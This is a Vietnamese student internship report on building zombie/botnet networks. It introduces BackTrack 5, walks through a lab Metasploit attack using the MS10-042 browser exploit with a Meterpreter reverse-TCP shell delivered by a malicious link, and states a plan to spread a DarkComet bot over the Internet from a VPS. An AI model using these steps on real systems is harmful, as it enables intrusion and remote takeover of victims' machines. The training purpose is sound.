BÁO CÁO THỰC TẬP CUỐI KHÓA  - TRUNG TÂM ATHENABÁO CÁO THỰC TẬP CUỐI KHÓA  - TRUNG TÂM ATHENA
BÁO CÁO THỰC TẬP CUỐI KHÓA - TRUNG TÂM ATHENA
 

Similaire à zombie-botnet (dongcatchay)

Bao cao hoai huy
Bao cao   hoai huyBao cao   hoai huy
Bao cao hoai huy
hoaihuysc
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
ice_eyes
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Danh Tran
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
MinhThien3715
 
Baocaocuoiky athena
Baocaocuoiky athenaBaocaocuoiky athena
Baocaocuoiky athena
Ly ND
 
Báo Cáo Cuối Kỳ
Báo Cáo Cuối KỳBáo Cáo Cuối Kỳ
Báo Cáo Cuối Kỳ
Ly ND
 
Báo Cáo Cuối Khóa
Báo Cáo Cuối KhóaBáo Cáo Cuối Khóa
Báo Cáo Cuối Khóa
Ly ND
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
Vũ Anh
 
Báo Cáo Thực Tập _System Hacking
Báo Cáo Thực Tập _System HackingBáo Cáo Thực Tập _System Hacking
Báo Cáo Thực Tập _System Hacking
Vũ Anh
 

Similaire à zombie-botnet (dongcatchay) (20)

Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳ
 
Bao cao hoai huy
Bao cao   hoai huyBao cao   hoai huy
Bao cao hoai huy
 
Báo cáo thực tập - Quốc Nghị
Báo cáo thực tập - Quốc NghịBáo cáo thực tập - Quốc Nghị
Báo cáo thực tập - Quốc Nghị
 
Bao cao cuoi ky
Bao cao cuoi kyBao cao cuoi ky
Bao cao cuoi ky
 
Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941Huỳnh bảo tân 12111941
Huỳnh bảo tân 12111941
 
Bao cao thuc tap ck
Bao cao thuc tap ckBao cao thuc tap ck
Bao cao thuc tap ck
 
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...Bao cao athena cuoi ky   backtrack và các công cụ kiểm tra an ninh mạng -trần...
Bao cao athena cuoi ky backtrack và các công cụ kiểm tra an ninh mạng -trần...
 
Báo cáo thực tập athena
Báo cáo thực tập athenaBáo cáo thực tập athena
Báo cáo thực tập athena
 
Báo cáo cuối kì
Báo cáo cuối kìBáo cáo cuối kì
Báo cáo cuối kì
 
Phân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tậpPhân tích mã độc cơ bản - báo cáo thực tập
Phân tích mã độc cơ bản - báo cáo thực tập
 
Baocaocuoiky athena
Baocaocuoiky athenaBaocaocuoiky athena
Baocaocuoiky athena
 
Báo cáo athena
Báo cáo  athenaBáo cáo  athena
Báo cáo athena
 
Báo Cáo Cuối Kỳ
Báo Cáo Cuối KỳBáo Cáo Cuối Kỳ
Báo Cáo Cuối Kỳ
 
Báo Cáo Cuối Khóa
Báo Cáo Cuối KhóaBáo Cáo Cuối Khóa
Báo Cáo Cuối Khóa
 
Báo cáo cuối kỳ
Báo cáo cuối kỳBáo cáo cuối kỳ
Báo cáo cuối kỳ
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo Cáo Thực Tập _System Hacking
Báo Cáo Thực Tập _System HackingBáo Cáo Thực Tập _System Hacking
Báo Cáo Thực Tập _System Hacking
 
Baocaothuctap
BaocaothuctapBaocaothuctap
Baocaothuctap
 
Báo cáo System hacking
Báo cáo System hackingBáo cáo System hacking
Báo cáo System hacking
 
bao cao cuoi ki
bao cao cuoi kibao cao cuoi ki
bao cao cuoi ki
 

Dernier

SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...
SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...
SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...
ChuThNgnFEFPLHN
 
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdfSLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
hoangtuansinh1
 
bài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhbài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hành
dangdinhkien2k4
 
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfxemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
Xem Số Mệnh
 

Dernier (20)

Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdfCampbell _2011_ - Sinh học - Tế bào - Ref.pdf
Campbell _2011_ - Sinh học - Tế bào - Ref.pdf
 
SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...
SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...
SD-05_Xây dựng website bán váy Lolita Alice - Phùng Thị Thúy Hiền PH 2 7 8 6 ...
 
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢIPHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
PHƯƠNG THỨC VẬN TẢI ĐƯỜNG SẮT TRONG VẬN TẢI
 
Bài giảng môn Truyền thông đa phương tiện
Bài giảng môn Truyền thông đa phương tiệnBài giảng môn Truyền thông đa phương tiện
Bài giảng môn Truyền thông đa phương tiện
 
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
TÀI LIỆU BỒI DƯỠNG HỌC SINH GIỎI LÝ LUẬN VĂN HỌC NĂM HỌC 2023-2024 - MÔN NGỮ ...
 
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdfSLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
SLIDE - Tu van, huong dan cong tac tuyen sinh-2024 (đầy đủ chi tiết).pdf
 
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘIGIÁO TRÌNH  KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
GIÁO TRÌNH KHỐI NGUỒN CÁC LOẠI - ĐIỆN LẠNH BÁCH KHOA HÀ NỘI
 
bài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hànhbài tập lớn môn kiến trúc máy tính và hệ điều hành
bài tập lớn môn kiến trúc máy tính và hệ điều hành
 
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdfBỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
BỘ LUYỆN NGHE VÀO 10 TIẾNG ANH DẠNG TRẮC NGHIỆM 4 CÂU TRẢ LỜI - CÓ FILE NGHE.pdf
 
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhhkinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
kinh tế chính trị mác lênin chương hai và hàng hoá và sxxhh
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdfxemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
xemsomenh.com-Vòng Tràng Sinh - Cách An 12 Sao Và Ý Nghĩa Từng Sao.pdf
 
sách sinh học đại cương - Textbook.pdf
sách sinh học đại cương   -   Textbook.pdfsách sinh học đại cương   -   Textbook.pdf
sách sinh học đại cương - Textbook.pdf
 
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
cac-cau-noi-tthcm.pdf-cac-cau-noi-tthcm-
 
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
SÁNG KIẾN ÁP DỤNG CLT (COMMUNICATIVE LANGUAGE TEACHING) VÀO QUÁ TRÌNH DẠY - H...
 
Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................Đề cương môn giải phẫu......................
Đề cương môn giải phẫu......................
 
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
1 - MÃ LỖI SỬA CHỮA BOARD MẠCH BẾP TỪ.pdf
 
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
GIÁO ÁN DẠY THÊM (KẾ HOẠCH BÀI DẠY BUỔI 2) - TIẾNG ANH 7 GLOBAL SUCCESS (2 CỘ...
 
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoáCác điều kiện bảo hiểm trong bảo hiểm hàng hoá
Các điều kiện bảo hiểm trong bảo hiểm hàng hoá
 
Access: Chuong III Thiet ke truy van Query.ppt
Access: Chuong III Thiet ke truy van Query.pptAccess: Chuong III Thiet ke truy van Query.ppt
Access: Chuong III Thiet ke truy van Query.ppt
 

zombie-botnet (dongcatchay)

  • 1. Trung Tâm Đào Tạo Quản Trị Mạng Và An Ninh Mạng Quốc Tế Athena  ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thống mạng GVHD: Võ Đỗ Thắng Sinh viên thục hiện: - NguyễnVăn Luân TP. Hồ Chí Minh, tháng 8 năm 2014
  • 2. MỤC LỤC LỜI MỞ ĐẦU........................................................................................................................... 2 1. Sự cần thiết của đề tài...................................................................................................... 2 2. Mục tiêu nghiên cứu........................................................................................................ 2 3. Phương pháp nghiên cứu.................................................................................................. 2 4. Kết cấu đề tài ................................................................................................................. 2 LỜI CẢM ƠN.............................................................................................................................. 4 NHẬN XÉT CỦA GIÁO VIÊN .......................................................................................................... 5 PHẦN 1 : GIỚI THIỆU VỀ BACKTRACK 5 ............................................................................... 6 1. Giới thiệu ...................................................................................................................... 6 2. Mục đích ....................................................................................................................... 6 3. Cài đặt........................................................................................................................... 7 PHẦN 2: TRIỂN KHAI TRONG MÔI TRƯỜNG LAN ............................................................... 14 1. Mô phỏng mạng LAN ................................................................................................... 14 .......................................................................................................................................... 14 2. Thử nghiệm xâm nhập bằng Metasploit ........................................................................... 14 PHẦN 3: XÂY DỰNG BOTNET BẰNG DARKCOMET ............................................................ 18 1. Giới thiệu DarkComet ................................................................................................... 18 2. Cài đặt DarkComet ....................................................................................................... 18 HƯỚNG PHÁT TRIỂN............................................................................................................ 35 KẾT LUẬN ............................................................................................................................ 36 TÀI LIỆU THAM KHẢO ......................................................................................................... 37
  • 3. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 2 LỜI MỞ ĐẦU 1. Sự cần thiết của đề tài Trong các kiểu tấn công hệ thống trên internet, tấn công DDoS (Distributed Denial of Service) là cách tấn công đơn giản, hiệu quả và khó phòng chống bậc nhất. DDoS là cách tấn công dựa vào việc gửi số lượng lớn yêu cầu (request) đến hệ thống nhằm chiếm dụng tài nguyên, làm cho hệ thống quá tải, không thể tiếp nhận và phục vụ các yêu cầu từ người dùng thực sự. Ví dụ điển hình là vào tháng 7 năm 2013, hàng loạt các trang báo điện tử của Việt Nam như Vietnamnet, Tuổi Trẻ Online, Dân Trí, Thanh niên Online bị tấn công dẫn đến không thể truy cập được trong nhiều tuần lễ liên tiếp. Theo thống kê từ Abort Network, đầu năm 2014 có hơn 100 vụ tấn công DDoS trên 100Gbps, 5733 vụ tấn công đạt 20Gbps gấp hơn hai lần năm 2013. Để có thể tạo được số lượng yêu cầu đủ lớn để đánh sập hệ thống mục tiêu, các hacker thường gây dựng mạng lưới zombie, botnet với số lượng có thể lên đến hàng triệu máy. Vì vậy, nghiên cứu về cách xây dựng mạng lưới zombie, botnet sẽ giúp chúng ta hiểu hơn về cách hoạt động, từ đó xây dựng các biện pháp phòng ngừa sự phát triển của hệ thống zombie, botnet. 2. Mục tiêu nghiên cứu Đề tài nghiên cứu trên hai môi trường: Giai đoạn 1: Trong môi trường mạng LAN, tìm ra được các lỗ hổng bảo mật trên các máy trong mạng, thử xâm nhập trên các máy. Giai đoạn 2: Trong môi trường Internet, dùng DarkComet để thử tạo, phát tán và điểu khiển mạng lưới botnet thông qua mạng Internet. 3. Phương pháp nghiên cứu Giai đoạn 1: Sử dụng ảo hóa VMware để mô phỏng môi trường mạng LAN. Cài đặt Backtrack trên một máy ảo VMware. Sau đó thực hiện thâm nhập từ máy Backtrack tới một mục tiêu. Giai đoạn 2: Cài đặt và tạo bot trên VPS (Virtual Private Server) và phát tán trên mạng. Sau đó thực hiện xâm nhập, kiểm soát từ xa thông qua địa chỉ IP public của VPS. 4. Kết cấu đề tài Phần 1: Giới thiệu về Backtrack 5 Phần 2: Triển khai trong môi trường LAN
  • 4. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 3 Phần 3: Triển khai xây dựng botnet bằng DarkComet Kết luận Qua thời gian học tập và nghiên cứu trên ghế nhà trường cùng với sự hỗ trợ tận tình của Thầy cô, bạn bè và người thân đã giúp em thu thập được nhiều kiến thức quý báo. Đặc biệt là quá trình thực tập tại Trung tâm ATHENA giúp chúng em có những trải nghiệm vô cùng thú vị và bổ ích. Với mong muốn tìm hiểu về mạng máy tính và góp phần xây dựng một mạng máy tính thân thiện, thông minh cho mọi người sử dụng. Tuy đã có rất nhiều cố gắng song không thể tránh những khuyết điểm, sai sót. Vì thế mong được sự thông cảm và những ý kiến đóng góp quý báo từ Quý Thầy Cô, bạn bè, bạn đọc để chúng em có thể ngày một hoàn thiện đề tài đã chọn một cách tốt hơn nữa. Xin chân thành cảm ơn
  • 5. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 4 LỜI CẢM ƠN Thực tập là quá trình tham gia học hỏi, so sánh, nghiên cứu và ứng dụng những kiến thức đã học vào thực tếcông việc ở cáccơ quan quản lý hành chính nhà nước và các công việc sau này. Với nhiều kiến thức còn bỡ ngỡ của một sinh viên năm cuối, chuyên ngành công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM, chúng em đã được tham gia trong suốt quá trình thực tập tại trung tâmAthena. Tại đây chúng em đã nhận được nhiều sự hỗ trợ và giúp đỡ của các bạn bè đồng nghiệp và đặc biệt là sự tận tình, chu đáo của thầy Võ Đỗ Thắng, giám đốc Trung tâm đào tạo và quản trị mạng an ninh quốc tế. Cùng với sự hỗ trợ từ phía nhà trường, xin gởi lời cảm ơn chân thành đến quý Thầy Cô khoa công nghệ thông tin trường Đại học Tài Nguyên Và Môi Trường TPHCM đã tạo điều kiện tốt nhất để chúng em hoàn thành khóa thực tậpnày. Với sự nỗ lực của bản thân và sự hỗ trợ giúp đỡ, kiến thức ban đầu vẫn còn nhiều hạn chế, vì vậy không tránh khỏi những thiếu sót trong quá trình hoàn thành báo cáo. Mong nhận được nhiều đóng góp ý kiến của quý Thầy Cô cũng như nhiều bạn cùng chuyên môn đểcó thể nắm vững kiến thức hơn. Sau cùng, chúng em xin kính chúc quý Thầy Cô trong Khoa Công Nghệ Thông Tin và Thầy Võ Đỗ Thắng lời chúc sức khỏe, niềm tin đểtiếp tục thực hiện sứ mệnh cao đẹp của mình_ truyền đạt kiến thức cho thế hệ mai sau.
  • 6. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 5 XÁC NHẬN CỦA CƠ QUAN THỦ TRƯỞNG (ký tên, đóng dấu) NHẬN XÉT CỦA GIÁO VIÊN .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. .................................................................................................................................................. …...., ngày….tháng….năm 2014 CÁN BỘ HƯỚNG DẪN (ký tên)
  • 7. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 6 PHẦN 1 : GIỚI THIỆU VỀ BACKTRACK 5 1. Giới thiệu Backtrack là bản phân phối dựa trên GNU/LINUX Debian nhắm mục đích pháp y kỹ thuật số và sử dụng thử nghiệm thâm nhập.Việc phân phối Backtrack có nguồn gốc từ sự hợp nhất của hai phân phối trước đây là cạnh tranh mà tập trung vào thử nghiệm thâm nhập: WHAX và Auditor Security Collection. 2. Mục đích Backtrack 5 có các công cụ được sử dụng cho quá trình thử nghiệm xâm nhập. Các công cụ kiểm tra xâm nhập trong backtrack 5 có thể được phân loại như sau : 1. Information gathering: loại này có chứa một số công cụ có thể được sử dụng để có được thông tin liên quan đến mục tiêu DNS,định tuyến, địa chỉ email,trang web,máy chủ mail…Thông tin này được thu thập từ các thông tin có sẵn trên internet,mà không cần chạm vào môi trường mục tiêu. 2. Network mapping: loại này chứa một số công cụ có thể được sử dụng để có kiểm tra các host đang tôn tại,thông tin về OS,ứng dụng được sử dụng bởi mục tiêu,và cũng làm portscanning. 3. Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). 4. Web application analysis: loại này chứa các công cụ có thể được sử dụng trong theo dõi, giám sát các ứng dụng web. 5. Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID). 6. Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. 7. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao đặc quyền của chúng ta cho các đặc quyền cao nhất. 8. Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy trì quyền truy cập. 9. Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ trong thể loại này.
  • 8. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 7 10. Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn. 11. Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ rối chương trình một hoặc tháo rời một tập tin thực thi. 3. Cài đặt Chúng ta có thể tải bản Backtrack 5 tại địa chỉ: www.backtrack- linux.org/downloads/, có bản cho Vmware và file ISO. 1. Live DVD Nếu chúng ta muốn sử dụng Backtrack mà không cần cài nó vào ổ cứng, chúng ta có thể ghi tập tin ảnh ISO vào đĩa DVD, và khởi động máy tính của chúng ta với DVD. Backtrack sau đó sẽ chạy từ đĩa DVD. Lợi thế của việc sử dụng Backtrack là một DVD Live là nó là rất dễ dàng để làm và chúng ta không cần phải gây rối với cấu hình máy hiện tại của chúng ta. Tuy nhiên, phương pháp này cũng có một số nhược điểm. Backtrack có thể không làm việc với phần cứng, và thay đổi cấu hình nào được thực hiện trên phần cứng để làm việc sẽ không được lưu với đĩa DVD Live. Ngoài ra, nó là chậm, vì máy tính cần phải tải các chương trình từ đĩa DVD. 2. Install  Cài đặt trong máy thật Chúng ta cần chuẩn bị một phân vùng để cài đặt Backtrack. Sau đó chạy Backtrack Live DVD. Khi gặp màn hình login, ta sử dụng username là root, pass là toor. Sau đó để vào chế độ đồ họa, ta gõ startx và ta sẽ vào chế độ đồ họa của Backtrack 5. Để cài đặt Backtrack 5 đến đĩa cứng ta chọn tập tin có tên install.sh trên desktop và tiến hành cài đặt. Tuy nhiên, nếu không thể tìm thấy tập tin, chúng ta có thể sử dụng ubiquity để cài đặt. Để sử dụng ubiquity, ta mở Terminal gõ ubiquity. Sau đó cửa sổ cài đặt sẽ hiển thị. Sau đó trả lời 1 số
  • 9. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 8 câu hỏi như thành phố chúng ta đang sống, keyboard layout, phân vùng ổ đĩa cài đặt,… Sau đó tiến hành cài đặt.  Cài đặt trong máy ảo Điểm thuận lợi là ta không cần chuẩn bị một phân vùng cho Backtrack, và sử dụng đồng thời một OS khác. Khuyết điểm là tốc độ chậm, không dùng được wireless trừ USB wireless. Ta có thể có thể sử dụng file VMWare được cung cấp bởi BackTrack. Từ đây chúng ta có BackTrack trên máy ảo thật dễ dàng và nhanh chóng. Cấu hình trong file VMWare là memory 768MB, hardisk :30GB, Network:NAT. Để sử dụng được card mạng thật, ta phải chọn Netword là Briged Dưới đây làm một số hình ảnh khi cài BackTrack trên máy ảo VMWare Tạo một máy ảo mới và cho đia BackTrack vào
  • 10. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 9 Giao diện khởi động của BackTrack Gõ startx để vào chế độ đồ họa trong BackTrack
  • 11. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 10 Để cài đặt, click chọn vào file Install BackTrack trên màn hình Desktop
  • 12. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 11 Chọn ngôn ngữ, chọn Tiếp để tiếp tục Chọn múi giờ, chọn Tiếp để tiếp tục
  • 13. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 12 Chọn ngôn ngữ bàn phím, chọn Forward để tiếp tục Chọn phân vùng để cài, chọn Tiếp để tiếp tục
  • 14. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 13 Nhấn Cài đặt để bắt đầu cài Quá trình cài đã bắt đầu. Sau khi hoàn tất, chúng ta khởi động lại
  • 15. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 14 PHẦN 2: TRIỂN KHAI TRONG MÔI TRƯỜNG LAN 1. Mô phỏng mạng LAN Mô hình mạng LAN được mô phỏng: Để chỉ định máy ảo sử dụng Bridge ảo VMnet0, trong giao diện VMware, kích chuột phải vào tên máy ảo, chọn Setting…, trong tab Hardware, chọn mục Network Adapter, sau đó trong mục Network Connection, chọn tùy chọn Bridged 2. Thử nghiệm xâm nhập bằng Metasploit Trong Backtrack5r3, chúng ta sử dụng công cụ Metasploit để thực hiện xâm nhập. Để khởi động giao diện Console của Metasploit, trong Terminal, gõ lệnh msfconsole. Switch PC1 PC2 PC3
  • 16. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 15 Để sử dụng một module nào đó, chúng ta sử dụng cú pháp: use <Đường dẫn đến module> VD: khai thác lỗi ms10_042 Sử dụng lệnh search ms10_042 để tìm ra moudle cần dùng
  • 17. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 16 use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec-> Enter Các thiết lập: set PAYLOAD windows/meterpreter/reverse_tcp set SRVHOST 192.168.1.101
  • 18. Trung tâm đào tạo Quản trị và An ninh mạng Athena ĐỀ TÀI: Nguyên cứu và triển khai mạng lưới zombie, botnet trên hệ thốngmạng Trang 17 set LHOST 192.168.1.101 exploit Sau khi exploit, Metasploit sẽ tạo một link chứa mã độc (http://192.168.1.101:80/), chỉ cần nạn nhân click vào link thì mã độc sẽ được gửi sang máy nạn nhân và sau đó có thể chiếm quyền máy.
